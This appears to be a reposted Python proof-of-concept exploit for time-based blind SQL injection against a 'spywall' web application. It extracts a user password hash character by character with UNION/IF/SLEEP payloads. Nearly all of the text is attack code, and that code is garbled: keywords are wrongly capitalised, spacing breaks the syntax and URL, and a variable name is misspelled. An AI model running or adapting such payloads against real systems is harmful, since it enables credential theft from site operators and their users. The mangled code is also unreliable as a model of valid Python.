#! /Usr/bin/python
# @ _ Kc57
# Blind SQLi POC
# Dumps out the first available hash in the users table of spywall_db
Import urllib
Import time
From time import sleep
Timing = '2. 5'
Checks = 0
Def check_char (I, pos ):
Global timimg
Global checks
Checks + = 1
Url = 'https: // www.2cto.com/spywall/destdes/deptUploads_data.php? Groupid = 1 union select 1, 2, IF (% s = conv (mid (select password from users), % s, 1), 16, 10), SLEEP (% s ), null); -- '% (I, pos, timing)
Start = time. time ()
Urllib. urlopen (url)
End = time. time ()
Howlong = end-start
Return howlong
Def check_pos (pos ):
For m in range (0, 16 ):
Output = check_char (m, pos)
Print "[*] Character % s-Took % s seconds" % (hex (m) [2:], output)
If output> 2:
Return hex (m) [2:]
Md5 =''
Start = time. time ()
For y in range (1, 33 ):
Print "Checking position % s" % (y)
Md5 + = check_pos (y)
Print md5
End = time. time ()
Howlong = end-start
Print "1st hash: % s" % (md5)
Print "Found in % s queries" % (checks)
Print "Found in % s" % (howlong)